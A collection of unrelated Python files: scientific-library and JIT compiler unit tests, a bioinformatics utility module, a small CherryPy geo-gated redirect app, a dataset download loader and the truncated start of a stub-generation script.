        self.assertEqual(len(allcg.get_geometries()), 68)
        self.assertEqual(len(allcg.get_geometries(coordination=3)), 3)
        self.assertEqual(sorted(allcg.get_geometries(returned='mp_symbol')), sorted(all_symbols))
        self.assertEqual(sorted(allcg.get_geometries(returned='mp_symbol', coordination=3)),
                         ['TL:3', 'TS:3', 'TY:3'])
        self.assertEqual(allcg.get_symbol_name_mapping(coordination=3),
                         {u'TY:3': u'Triangular non-coplanar', u'TL:3': u'Trigonal plane', u'TS:3': u'T-shaped'})
        self.assertEqual(allcg.get_symbol_cn_mapping(coordination=3),
                         {u'TY:3': 3, u'TL:3': 3, u'TS:3': 3})
        self.assertEqual(sorted(allcg.get_implemented_geometries(coordination=4, returned='mp_symbol')),
                         [u'S:4', u'SS:4', u'SY:4', u'T:4'])
        self.assertEqual(sorted(allcg.get_not_implemented_geometries(returned='mp_symbol')),
                         [u'CO:11', u'DD:20', u'H:10', u'S:10', u'S:12', u'UNCLEAR', u'UNKNOWN'])
        self.assertEqual(allcg.get_geometry_from_name('Octahedron').mp_symbol, cg_oct.mp_symbol)
        with self.assertRaises(LookupError) as cm:
            allcg.get_geometry_from_name('Octahedran')
        self.assertEqual(str(cm.exception), 'No coordination geometry found with name "Octahedran"')
        self.assertEqual(allcg.get_geometry_from_IUPAC_symbol('OC-6').mp_symbol, cg_oct.mp_symbol)
        with self.assertRaises(LookupError) as cm:
            allcg.get_geometry_from_IUPAC_symbol('OC-7')
        self.assertEqual(str(cm.exception), 'No coordination geometry found with IUPAC symbol "OC-7"')
        self.assertEqual(allcg.get_geometry_from_IUCr_symbol('[6o]').mp_symbol, cg_oct.mp_symbol)
        with self.assertRaises(LookupError) as cm:
            allcg.get_geometry_from_IUCr_symbol('[6oct]')
        self.assertEqual(str(cm.exception), 'No coordination geometry found with IUCr symbol "[6oct]"')
        with self.assertRaises(LookupError) as cm:
            allcg.get_geometry_from_mp_symbol('O:7')
        self.assertEqual(str(cm.exception), 'No coordination geometry found with mp_symbol "O:7"')
        self.assertEqual(allcg.pretty_print(maxcn=4),
                         '+-------------------------+\n| Coordination geometries |\n+-------------------------+\n'
                         '\n==>> CN = 1 <<==\n - S:1 : Single neighbor\n\n'
                         '==>> CN = 2 <<==\n'
                         ' - L:2 : Linear\n - A:2 : Angular\n\n'
                         '==>> CN = 3 <<==\n'
                         ' - TL:3 : Trigonal plane\n - TY:3 : Triangular non-coplanar\n - TS:3 : T-shaped\n\n'
                         '==>> CN = 4 <<==\n - T:4 : Tetrahedron\n - S:4 : Square plane\n'
                         ' - SY:4 : Square non-coplanar\n - SS:4 : See-saw\n\n')
        self.assertEqual(allcg.pretty_print(maxcn=2, type='all_geometries_latex'),
                         '\\subsection*{Coordination 1}\n\n\\begin{itemize}\n'
                         '\\item S:1 $\\rightarrow$ Single neighbor (IUPAC : None - IUCr : $[$1l$]$)\n'
                         '\\end{itemize}\n\n\\subsection*{Coordination 2}\n\n\\begin{itemize}\n'
                         '\\item L:2 $\\rightarrow$ Linear (IUPAC : L-2 - IUCr : $[$2l$]$)\n'
                         '\\item A:2 $\\rightarrow$ Angular (IUPAC : A-2 - IUCr : $[$2n$]$)\n'
                         '\\end{itemize}\n\n')
        self.assertEqual(allcg.pretty_print(maxcn=2, type='all_geometries_latex_images'),
                         '\\section*{Coordination 1}\n\n\\subsubsection*{S:1 : Single neighbor}\n\n'
                         'IUPAC : None\n\nIUCr : [1l]\n\n\\begin{center}\n'
                         '\\includegraphics[scale=0.15]{images/S_1.png}\n'
                         '\\end{center}\n\n\\section*{Coordination 2}\n\n'
                         '\\subsubsection*{L:2 : Linear}\n\nIUPAC : L-2\n\n'
                         'IUCr : [2l]\n\n\\begin{center}\n\\includegraphics[scale=0.15]{images/L_2.png}\n'
                         '\\end{center}\n\n\\subsubsection*{A:2 : Angular}\n\nIUPAC : A-2\n\nIUCr : [2n]\n\n'
                         '\\begin{center}\n\\includegraphics[scale=0.15]{images/A_2.png}\n\\end{center}\n\n')
        self.assertDictEqual(allcg.minpoints, {6: 2, 7: 2, 8: 2, 9: 2, 10: 2, 11: 2, 12: 2, 13: 3})
        self.assertDictEqual(allcg.maxpoints, {6: 5, 7: 5, 8: 6, 9: 7, 10: 6, 11: 5, 12: 8, 13: 6})
        self.assertDictEqual(allcg.maxpoints_inplane, {6: 5, 7: 5, 8: 6, 9: 7, 10: 6, 11: 5, 12: 8, 13: 6})
        self.assertDictEqual(allcg.separations_cg, {6: {(0, 3, 3): [u'O:6', u'T:6'],
                                                        (1, 4, 1): [u'O:6'],
                                                        (0, 5, 1): [u'PP:6'],
                                                        (2, 2, 2): [u'PP:6'],
                                                        (0, 4, 2): [u'T:6']},
                                                    7: {(1, 3, 3): [u'ET:7', u'FO:7'],
                                                        (2, 3, 2): [u'PB:7', u'ST:7', u'ET:7'],
                                                        (1, 4, 2): [u'ST:7', u'FO:7'],
                                                        (1, 5, 1): [u'PB:7']},
                                                    8: {(1, 6, 1): [u'HB:8'],
                                                        (0, 4, 4):
                                                            [u'C:8', u'SA:8', u'SBT:8'],
                                                        (1, 4, 3): [u'SA:8', u'SBT:8', u'BO_2:8', u'BO_3:8'],
                                                        (2, 4, 2): [u'C:8', u'TBT:8', u'DD:8', u'DDPN:8', u'HB:8',
                                                                    u'BO_1:8', u'BO_1:8', u'BO_2:8', u'BO_2:8',
                                                                    u'BO_3:8', u'BO_3:8']},
                                                    9: {(3, 3, 3): [u'TT_1:9', u'TT_1:9', u'TT_2:9', u'SMA:9',
                                                                    u'SMA:9', u'TO_1:9', u'TO_3:9'],
                                                        (0, 6, 3): [u'TC:9'],
                                                        (2, 4, 3): [u'TC:9', u'TT_2:9', u'TT_3:9', u'TI:9',
                                                                    u'SS:9', u'TO_1:9', u'TO_1:9', u'TO_2:9',
                                                                    u'TO_3:9'],
                                                        (1, 3, 5): [u'TI:9'],
                                                        (1, 4, 4): [u'TT_1:9', u'SMA:9', u'SS:9'],
                                                        (2, 3, 4): [u'TC:9'],
                                                        (2, 5, 2): [u'TT_3:9', u'SS:9', u'TO_2:9'],
                                                        (1, 7, 1): [u'HD:9']},
                                                    10: {(0, 5, 5): [u'PP:10', u'PA:10'],
                                                         (3, 4, 3): [u'PA:10', u'SBSA:10', u'MI:10',
                                                                     u'BS_2:10', u'TBSA:10'],
                                                         (2, 6, 2): [u'BS_1:10'],
                                                         (2, 4, 4): [u'PP:10', u'MI:10', u'BS_2:10'],
                                                         (3, 3, 4): [u'SBSA:10'],
                                                         (1, 4, 5): [u'BS_2:10'],
                                                         (0, 4, 6): [u'BS_1:10', u'TBSA:10']},
                                                    11: {(4, 3, 4): [u'PCPA:11'],
                                                         (3, 4, 4): [u'DI:11'],
                                                         (1, 5, 5): [u'PCPA:11', u'DI:11'],
                                                         (3, 5, 3): [u'H:11']},
                                                    12: {(3, 3, 6): [u'TT:12'],
                                                         (2, 4, 6): [u'TT:12'],
                                                         (0, 6, 6): [u'HP:12', u'HA:12'],
                                                         (3, 6, 3): [u'C:12', u'AC:12'],
                                                         (4, 4, 4): [u'I:12', u'PBP:12', u'C:12', u'HP:12'],
                                                         (0, 8, 4): [u'SC:12']},
                                                    13: {(0, 6, 7): [u'SH:13']}})
if __name__ == "__main__":
    # Allow running this test module directly with the unittest runner.
    unittest.main()
|
import logging
import os
import subprocess
import traceback
from zipfile import ZipFile
from os import listdir
from os.path import isfile, join
'''
A utility python module containing a set of methods necessary for this kbase
module.
'''
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
def create_logger(log_dir, name):
    """Build a named logger that appends to ``<log_dir>/<name>.log``.

    args: log_dir (str): directory in which the log file is created
          name (str): name of logger (also used as the log file stem)
    returns: logger (obj): logging.Logger instance
    """
    log_formatter = logging.Formatter('%(asctime)s - %(process)d - %(name)s - '
                                      ' %(levelname)s -%(message)s')
    file_handler = logging.FileHandler(os.path.join(log_dir, name + '.log'))
    file_handler.setFormatter(log_formatter)
    new_logger = logging.getLogger(name)
    new_logger.addHandler(file_handler)
    return new_logger
def if_obj_exists(logger, ws_client, ws_id, o_type, obj_l):
    """Return (name, ref) pairs for the names in obj_l that already exist
    in workspace ws_id (hidden objects included), or None when none do.

    The ref is assembled as 'wsid/objid/version' from the object info tuple.
    """
    listing = ws_client.list_objects({"workspaces": [ws_id], "type": o_type, 'showHidden': 1})
    names_present = set(info[1] for info in listing)
    matches = [name for name in obj_l if name in names_present]
    if not matches:
        return None
    queries = [{'name': name, 'workspace': ws_id} for name in matches]
    infos = ws_client.get_object_info_new({"objects": queries})
    return [(str(info[1]), str(info[6]) + '/' + str(info[0]) + '/' + str(info[4]))
            for info in infos]
def log(message, level=logging.INFO, logger=None):
    """Emit *message* through *logger*, or print it to stdout when logger is None.

    Without a logger only the five standard logging levels are printed;
    any other level value is silently ignored.
    """
    if logger is not None:
        logger.log(level, '\n' + message + '\n')
        return
    prefixes = {logging.DEBUG: 'DEBUG',
                logging.INFO: 'INFO',
                logging.WARNING: 'WARNING',
                logging.ERROR: 'ERROR',
                logging.CRITICAL: 'CRITICAL'}
    if level in prefixes:
        print('\n' + prefixes[level] + ': ' + message + '\n')
def zip_files(logger, src_path, output_fn):
    """
    Compress every regular file (subdirectories excluded) found directly
    in src_path into the zip archive output_fn.
    """
    with ZipFile(output_fn, 'w', allowZip64=True) as archive:
        for entry in listdir(src_path):
            full = join(src_path, entry)
            if isfile(full):
                # Store under the bare file name, not the full path.
                archive.write(full, entry)
def unzip_files(logger, src_fn, dst_path):
    """
    Extract the entire archive src_fn into the directory dst_path.
    """
    with ZipFile(src_fn, 'r') as archive:
        archive.extractall(dst_path)
def whereis(program):
    """
    returns path of ``program`` if it exists in your ``$PATH`` variable or
    ``None`` otherwise
    """
    # os.pathsep (':' on POSIX, ';' on Windows) instead of a hard-coded ':'
    # so the lookup also works on non-POSIX platforms.
    for path in os.environ.get('PATH', '').split(os.pathsep):
        candidate = os.path.join(path, program)
        # A match must be an existing entry that is not a directory.
        if os.path.exists(candidate) and not os.path.isdir(candidate):
            return candidate
    return None
def runProgram(logger=None,
               progName=None,
               argStr=None,
               script_dir=None,
               working_dir=None):
    """
    Convenience func to handle calling and monitoring output of external programs.
    :param logger: optional logging.Logger; falls back to stdout when None
    :param progName: name of system program command
    :param argStr: string containing command line options for ``progName``
    :param script_dir: optional directory searched for ``progName`` before $PATH
    :param working_dir: optional cwd for the child process (current dir if None)
    :returns: dict with the child's "result" (stdout) and "stderr"
    :raises RuntimeError: if ``progName`` cannot be located or the command
        exits with a non-zero return code
    """
    # Ensure program is callable: prefer an explicit script_dir copy, then
    # fall back to a $PATH lookup.  (Previously the script_dir path was
    # computed but immediately overwritten by the PATH lookup.)
    progPath = None
    if script_dir is not None:
        candidate = os.path.join(script_dir, progName)
        if os.path.exists(candidate) and not os.path.isdir(candidate):
            progPath = candidate
    if progPath is None:
        progPath = whereis(progName)
    if not progPath:
        raise RuntimeError(
            None,
            '{0} command not found in your PATH environmental variable. {1}'.format(
                progName,
                os.environ.get(
                    'PATH',
                    '')))
    # Construct shell command
    cmdStr = "%s %s" % (progPath, argStr)
    if logger is not None:
        # The old code also called logger.info() in the logger-is-None
        # branch, which always crashed with an AttributeError; only log
        # when a logger was actually supplied.
        if working_dir is None:
            logger.info("Executing: " + cmdStr + " on cwd")
        else:
            logger.info("Executing: " + cmdStr + " on " + working_dir)
    else:
        print("Executing : " + cmdStr)
    # Set up process obj
    process = subprocess.Popen(cmdStr,
                               shell=True,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               cwd=working_dir)
    # Get results
    result, stderr = process.communicate()
    # keep this until your code is stable for easier debugging
    if logger is not None and result is not None and len(result) > 0:
        logger.info(result)
    elif result is not None:
        print(result)
    if logger is not None and stderr is not None and len(stderr) > 0:
        logger.info(stderr)
    elif stderr is not None:
        print(stderr)
    # Check returncode for success/failure; a second `raise` used to sit
    # unreachably behind the first one — merged into a single failure path.
    if process.returncode != 0:
        raise RuntimeError(
            'Return Code : {0} , result {1} , progName {2}'.format(
                process.returncode, result, progName))
    # Return result
    return {"result": result, "stderr": stderr}
def check_sys_stat(logger):
    # Log a snapshot of disk, memory and CPU usage via the system tools
    # df / vmstat / mpstat (see the helpers below).
    check_disk_space(logger)
    check_memory_usage(logger)
    check_cpu_usage(logger)
def check_disk_space(logger):
    """Report free disk space by running ``df -h``."""
    runProgram(progName="df", argStr="-h", logger=logger)
def check_memory_usage(logger):
    """Report memory statistics by running ``vmstat -s``."""
    runProgram(progName="vmstat", argStr="-s", logger=logger)
def check_cpu_usage(logger):
    """Report per-CPU utilisation by running ``mpstat -P ALL``."""
    runProgram(progName="mpstat", argStr="-P ALL", logger=logger)
|
import py
from rpython.flowspace.model import SpaceOperation, Constant, Variable
from rpython.rtyper.lltypesystem import lltype, llmemory, rffi
from rpython.translator.unsimplify import varoftype
from rpython.rlib import jit
from rpython.jit.codewriter import support, call
from rpython.jit.codewriter.call import CallControl
from rpython.jit.codewriter.effectinfo import EffectInfo
class FakePolicy:
    """JIT policy stand-in that lets the codewriter look inside every graph."""
    def look_inside_graph(self, graph):
        """Always allow inspection of *graph*."""
        return True
def test_graphs_from_direct_call():
    """graphs_from() on a direct_call: residual when the callee's graph is
    not in the candidate set, otherwise the one-element graph list."""
    cc = CallControl()
    F = lltype.FuncType([], lltype.Signed)
    f = lltype.functionptr(F, 'f', graph='fgraph')
    v = varoftype(lltype.Signed)
    op = SpaceOperation('direct_call', [Constant(f, lltype.Ptr(F))], v)
    #
    lst = cc.graphs_from(op, {}.__contains__)
    assert lst is None # residual call
    #
    lst = cc.graphs_from(op, {'fgraph': True}.__contains__)
    assert lst == ['fgraph'] # normal call
def test_graphs_from_indirect_call():
    """graphs_from() on an indirect_call filters the constant graph list
    through the policy callback: all kept, some kept, or none (residual)."""
    cc = CallControl()
    F = lltype.FuncType([], lltype.Signed)
    v = varoftype(lltype.Signed)
    graphlst = ['f1graph', 'f2graph']
    op = SpaceOperation('indirect_call', [varoftype(lltype.Ptr(F)),
                                          Constant(graphlst, lltype.Void)], v)
    #
    lst = cc.graphs_from(op, {'f1graph': True, 'f2graph': True}.__contains__)
    assert lst == ['f1graph', 'f2graph'] # normal indirect call
    #
    lst = cc.graphs_from(op, {'f1graph': True}.__contains__)
    assert lst == ['f1graph'] # indirect call, look only inside some graphs
    #
    lst = cc.graphs_from(op, {}.__contains__)
    assert lst is None # indirect call, don't look inside any graph
def test_graphs_from_no_target():
    """An indirect_call whose graph list is None is treated as residual."""
    cc = CallControl()
    FUNC = lltype.FuncType([], lltype.Signed)
    res_var = varoftype(lltype.Signed)
    callee = varoftype(lltype.Ptr(FUNC))
    op = SpaceOperation('indirect_call',
                        [callee, Constant(None, lltype.Void)],
                        res_var)
    assert cc.graphs_from(op, {}.__contains__) is None
class FakeJitDriverSD:
    """Minimal jitdriver description: a portal graph plus a dummy runner ptr."""
    def __init__(self, portal_graph):
        # Only these two attributes of a real JitDriverSD are needed here.
        self.portal_runner_ptr = "???"
        self.portal_graph = portal_graph
def test_find_all_graphs():
    """With a look-inside-everything policy, find_all_graphs() returns the
    portal graph and everything reachable from it (here: f and g)."""
    def g(x):
        return x + 2
    def f(x):
        return g(x) + 1
    rtyper = support.annotate(f, [7])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    funcs = set([graph.func for graph in res])
    assert funcs == set([f, g])
def test_find_all_graphs_without_g():
    """A policy that vetoes g keeps g's graph out of the result; only the
    portal graph f remains."""
    def g(x):
        return x + 2
    def f(x):
        return g(x) + 1
    rtyper = support.annotate(f, [7])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(jitdrivers_sd=[jitdriver_sd])
    class CustomFakePolicy:
        # The only graph the policy should ever be asked about is g's.
        def look_inside_graph(self, graph):
            assert graph.name == 'g'
            return False
    res = cc.find_all_graphs(CustomFakePolicy())
    funcs = [graph.func for graph in res]
    assert funcs == [f]
def test_guess_call_kind_and_calls_from_graphs():
    """Exercise guess_call_kind()/graphs_from() over every call shape:
    recursive portal calls, residual calls, oopspec builtins, and regular
    direct/indirect calls into candidate graphs."""
    class portal_runner_obj:
        graph = object()
    class FakeJitDriverSD:
        portal_runner_ptr = portal_runner_obj
    g = object()
    g1 = object()
    cc = CallControl(jitdrivers_sd=[FakeJitDriverSD()])
    cc.candidate_graphs = [g, g1]
    # Calling the portal runner itself is classified as recursive.
    op = SpaceOperation('direct_call', [Constant(portal_runner_obj)],
                        Variable())
    assert cc.guess_call_kind(op) == 'recursive'
    # A callee without a graph attribute is residual.
    class fakeresidual:
        _obj = object()
    op = SpaceOperation('direct_call', [Constant(fakeresidual)],
                        Variable())
    assert cc.guess_call_kind(op) == 'residual'
    # A callee whose function carries an oopspec is a builtin call.
    class funcptr:
        class _obj:
            class graph:
                class func:
                    oopspec = "spec"
    op = SpaceOperation('direct_call', [Constant(funcptr)],
                        Variable())
    assert cc.guess_call_kind(op) == 'builtin'
    # Direct call to a candidate graph: regular.
    class funcptr:
        class _obj:
            graph = g
    op = SpaceOperation('direct_call', [Constant(funcptr)],
                        Variable())
    res = cc.graphs_from(op)
    assert res == [g]
    assert cc.guess_call_kind(op) == 'regular'
    # Direct call to a non-candidate graph: residual.
    class funcptr:
        class _obj:
            graph = object()
    op = SpaceOperation('direct_call', [Constant(funcptr)],
                        Variable())
    res = cc.graphs_from(op)
    assert res is None
    assert cc.guess_call_kind(op) == 'residual'
    # Indirect call: the candidates are filtered from the given graph list.
    h = object()
    op = SpaceOperation('indirect_call', [Variable(),
                                          Constant([g, g1, h])],
                        Variable())
    res = cc.graphs_from(op)
    assert res == [g, g1]
    assert cc.guess_call_kind(op) == 'regular'
    # No candidate in the list at all: residual again.
    op = SpaceOperation('indirect_call', [Variable(),
                                          Constant([h])],
                        Variable())
    res = cc.graphs_from(op)
    assert res is None
    assert cc.guess_call_kind(op) == 'residual'
def test_get_jitcode(monkeypatch):
    """get_jitcode() builds a jitcode named after the graph, caches it per
    graph, and queues the (graph, jitcode) pair for later processing."""
    from rpython.jit.codewriter.test.test_flatten import FakeCPU
    class FakeRTyper:
        class annotator:
            translator = None
    # Replace the real getfunctionptr: any graph maps to a fresh 'bar' funcptr.
    def getfunctionptr(graph):
        F = lltype.FuncType([], lltype.Signed)
        return lltype.functionptr(F, 'bar')
    monkeypatch.setattr(call, 'getfunctionptr', getfunctionptr)
    cc = CallControl(FakeCPU(FakeRTyper()))
    class somegraph:
        name = "foo"
    jitcode = cc.get_jitcode(somegraph)
    assert jitcode is cc.get_jitcode(somegraph) # caching
    assert jitcode.name == "foo"
    pending = list(cc.enum_pending_graphs())
    assert pending == [(somegraph, jitcode)]
def test_jit_force_virtualizable_effectinfo():
    # Placeholder: the EF_* classification that getcalldescr() assigns to
    # jit_force_virtualizable is still untested.
    py.test.skip("XXX add a test for CallControl.getcalldescr() -> EF_xxx")
def test_releases_gil_analyzer():
    """A release-GIL external call hidden behind dont_look_inside gets
    random effects but is NOT flagged as call_release_gil."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    T = rffi.CArrayPtr(rffi.TIME_T)
    external = rffi.llexternal("time", [T], rffi.TIME_T, releasegil=True)
    @jit.dont_look_inside
    def f():
        return external(lltype.nullptr(T.TO))
    rtyper = support.annotate(f, [])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    # f's graph contains exactly one operation: the residual external call.
    [f_graph] = [x for x in res if x.func is f]
    [block, _] = list(f_graph.iterblocks())
    [op] = block.operations
    call_descr = cc.getcalldescr(op)
    assert call_descr.extrainfo.has_random_effects()
    assert call_descr.extrainfo.is_call_release_gil() is False
def test_call_release_gil():
    """With save_err set and the call visible to the JIT, the descr is a
    call_release_gil whose target carries the saved-errno flag."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    T = rffi.CArrayPtr(rffi.TIME_T)
    external = rffi.llexternal("time", [T], rffi.TIME_T, releasegil=True,
                               save_err=rffi.RFFI_SAVE_ERRNO)
    # no jit.dont_look_inside in this test
    def f():
        return external(lltype.nullptr(T.TO))
    rtyper = support.annotate(f, [])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    [llext_graph] = [x for x in res if x.func is external]
    [block, _] = list(llext_graph.iterblocks())
    [op] = block.operations
    # The wrapper graph records a (target, save_err) pair for the call.
    tgt_tuple = op.args[0].value._obj.graph.func._call_aroundstate_target_
    assert type(tgt_tuple) is tuple and len(tgt_tuple) == 2
    call_target, saveerr = tgt_tuple
    assert saveerr == rffi.RFFI_SAVE_ERRNO
    call_target = llmemory.cast_ptr_to_adr(call_target)
    call_descr = cc.getcalldescr(op)
    assert call_descr.extrainfo.has_random_effects()
    assert call_descr.extrainfo.is_call_release_gil() is True
    assert call_descr.extrainfo.call_release_gil_target == (
        call_target, rffi.RFFI_SAVE_ERRNO)
def test_random_effects_on_stacklet_switch():
    """A stacklet switch call must be treated as having random effects."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    from rpython.translator.platform import CompilationError
    try:
        from rpython.rlib._rffi_stacklet import switch, handle
    except CompilationError as e:
        # Stacklets are unavailable on some platforms; skip only there.
        if "Unsupported platform!" in e.out:
            py.test.skip("Unsupported platform!")
        else:
            raise e
    @jit.dont_look_inside
    def f():
        switch(rffi.cast(handle, 0))
    rtyper = support.annotate(f, [])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    [f_graph] = [x for x in res if x.func is f]
    [block, _] = list(f_graph.iterblocks())
    op = block.operations[-1]
    call_descr = cc.getcalldescr(op)
    assert call_descr.extrainfo.has_random_effects()
def test_no_random_effects_for_rotateLeft():
    """_rotateLeft is elidable: its call descr has no random effects."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    from rpython.rlib.rarithmetic import r_uint
    if r_uint.BITS == 32:
        py.test.skip("64-bit only")
    from rpython.rlib.rmd5 import _rotateLeft
    def f(n, m):
        return _rotateLeft(r_uint(n), m)
    rtyper = support.annotate(f, [7, 9])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    [f_graph] = [x for x in res if x.func is f]
    [block, _] = list(f_graph.iterblocks())
    op = block.operations[-1]
    call_descr = cc.getcalldescr(op)
    assert not call_descr.extrainfo.has_random_effects()
    assert call_descr.extrainfo.check_is_elidable()
def test_elidable_kinds():
    """Each elidable function is classified by what it may raise: nothing,
    only MemoryError (allocation), or arbitrary exceptions."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    @jit.elidable
    def f1(n, m):
        return n + m
    @jit.elidable
    def f2(n, m):
        return [n, m] # may raise MemoryError
    @jit.elidable
    def f3(n, m):
        if n > m:
            raise ValueError
        return n + m
    def f(n, m):
        a = f1(n, m)
        b = f2(n, m)
        c = f3(n, m)
        return a + len(b) + c
    rtyper = support.annotate(f, [7, 9])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    [f_graph] = [x for x in res if x.func is f]
    # The three calls in f appear in order; check each descr's extraeffect.
    for index, expected in [
            (0, EffectInfo.EF_ELIDABLE_CANNOT_RAISE),
            (1, EffectInfo.EF_ELIDABLE_OR_MEMORYERROR),
            (2, EffectInfo.EF_ELIDABLE_CAN_RAISE)]:
        call_op = f_graph.startblock.operations[index]
        assert call_op.opname == 'direct_call'
        call_descr = cc.getcalldescr(call_op)
        assert call_descr.extrainfo.extraeffect == expected
def test_raise_elidable_no_result():
    """An elidable function that returns nothing (side effects only) is
    rejected: getcalldescr() must raise."""
    from rpython.jit.backend.llgraph.runner import LLGraphCPU
    l = []
    @jit.elidable
    def f1(n, m):
        l.append(n)
    def f(n, m):
        f1(n, m)
        return n + m
    rtyper = support.annotate(f, [7, 9])
    jitdriver_sd = FakeJitDriverSD(rtyper.annotator.translator.graphs[0])
    cc = CallControl(LLGraphCPU(rtyper), jitdrivers_sd=[jitdriver_sd])
    res = cc.find_all_graphs(FakePolicy())
    [f_graph] = [x for x in res if x.func is f]
    call_op = f_graph.startblock.operations[0]
    assert call_op.opname == 'direct_call'
    with py.test.raises(Exception):
        call_descr = cc.getcalldescr(call_op)
|
import importlib
import logging
import os
import pprint
import sys
import StringIO
import cherrypy
import requests
def full_path(*extra):
    """Absolute path built from this module's directory plus *extra* parts."""
    base = os.path.dirname(__file__)
    return os.path.join(base, *extra)
sys.path.insert(0, full_path())
import db
logging.basicConfig()
sorry = 'This is only for US Citizens. Sorry and thank you for your time.'
class Root(object):
    """CherryPy app resolving short tags to redirect URLs, gated to US IPs."""
    @cherrypy.expose
    def index(self, tag):
        """Redirect US visitors to the URL registered under *tag*; everyone
        else receives the apology text instead."""
        destination = db.urls[tag]
        client_ip = cherrypy.request.headers['Remote-Addr']
        lookup_url = 'http://ipinfo.io/{0}/country'.format(client_ip)
        response = requests.get(lookup_url)
        if response.text.strip() == 'US':
            raise cherrypy.HTTPRedirect(destination)
        return sorry
|
from battle_tested.beta.input_type_combos import input_type_combos
|
import os
import sys
import numpy as np
import matplotlib.image as mpimg
from ..core.data import Data
from ..util import tryremove
URL = 'http://synthia-dataset.cvc.uab.cat/SYNTHIA_SEQS/'
SEQS = [ # SUMMER and WINTER from sequences `1 - 6`
'SYNTHIA-SEQS-01-SUMMER',
'SYNTHIA-SEQS-01-WINTER',
'SYNTHIA-SEQS-02-SUMMER',
'SYNTHIA-SEQS-02-WINTER',
'SYNTHIA-SEQS-04-SUMMER',
'SYNTHIA-SEQS-04-WINTER',
'SYNTHIA-SEQS-05-SUMMER',
'SYNTHIA-SEQS-05-WINTER',
'SYNTHIA-SEQS-06-SUMMER',
'SYNTHIA-SEQS-06-WINTER'
]
DEV_SEQS = ['SYNTHIA-SEQS-01-SUMMER']
class SynthiaData(Data):
    """Loader for the SYNTHIA synthetic driving sequences.

    Downloads the configured SUMMER/WINTER sequences on demand and exposes
    each sequence's left-camera RGB view directories as raw data folders.
    """
    dirs = ['synthia']
    def __init__(self, data_dir, stat_log_dir=None,
                 development=True, fast_dir=None):
        super().__init__(data_dir, stat_log_dir,
                         development=development,
                         fast_dir=fast_dir)
    def _fetch_if_missing(self):
        # Hook invoked by the base class; downloads any missing sequences.
        self._maybe_get_synthia()
    def get_raw_dirs(self):
        """Return all RGB/Stereo_Left view directories of every sequence."""
        root_dir = os.path.join(self.current_dir, 'synthia')
        dirs = []
        for seq in os.listdir(root_dir):
            seq_dir = os.path.join(root_dir, seq, seq, 'RGB', 'Stereo_Left')
            for view in os.listdir(seq_dir):
                # append() instead of extend([...]): one directory per view.
                dirs.append(os.path.join(seq_dir, view))
        return dirs
    def _maybe_get_synthia(self):
        """Download and unpack any sequence archives not yet on disk."""
        seqs = DEV_SEQS if self.development else SEQS
        # Loop-invariant: the synthia root does not depend on the sequence.
        root_dir = os.path.join(self.data_dir, 'synthia')
        for seq in seqs:
            url = URL + seq + '.rar'
            url_dir = os.path.join(root_dir, seq)
            if not os.path.isdir(url_dir):
                self._download_and_extract(url, url_dir, 'rar')
            # Remove unused directories (ground truth, depth, calibration
            # and the right stereo camera) to save disk space.
            tryremove(os.path.join(url_dir, seq, 'GT'))
            tryremove(os.path.join(url_dir, seq, 'Depth'))
            tryremove(os.path.join(url_dir, seq, 'CameraParams'))
            tryremove(os.path.join(url_dir, 'RGB', 'Stereo_Right'))
|
import sys
from genStubs import *
stub = Stubs( "systemMessages", sys.argv[1], sys.argv[2] )

# Message-bus base interface header first, then one generated nanopb header
# per protobuf message file.  The headers are driven from a data list so the
# sequence of stub.include() calls stays identical to the hand-written form.
stub.include( "nanopb/IMessage.h" )

_PB_HEADERS = [
    "AGLMsg", "AGLOffsetMsg", "AGLRawMsg", "AbortLaunchMsg",
    "AccelGyroDataMsg", "AccelGyroDataRaw",
    "ActiveControlSourceNotification", "ActiveManeuverSourceNotification",
    "ActuatorConstants", "ActuatorPictureMsg", "ActuatorPortCalibration",
    "ActuatorPortConfigMsg", "ActuatorPowerBusMsg", "ActuatorTakePicture",
    "AeroTerminateMsg", "AirmailDebugLogSettingsMsg", "AirmailPoolStatsMsg",
    "AirspeedCalibrationDataMsg", "AltMSLCorrection", "AnnounceMsg",
    "AttCtrlConfig", "AuxControlMix", "AwxHeaderMsg", "BoardStatus",
    "ClientRequest", "ConnectionStatus", "ContingencyEventMap",
    "ContingencyEventStatus", "ControlLog", "ControlLogRateConfig",
    "ControlRequest", "DateOfLastConfigurationMsg", "DeviceManagerMsgs",
    "EffectorCmdsMsg", "EffectorStatusMsg", "EffectorSurfaceMap",
    "EthernetStatusMsg", "Example", "FileTransferMsg", "FlightStatus",
    "GCSConnectivityStatus", "GCSJobInfoMsg", "GPSData", "GPSRestartMsg",
    "GPSStatus", "Geofence", "GuidanceConfig", "HealthEventMsg",
    "HobbsMeter", "IMUOrientationConfig", "INSAccelData", "INSAncillaryData",
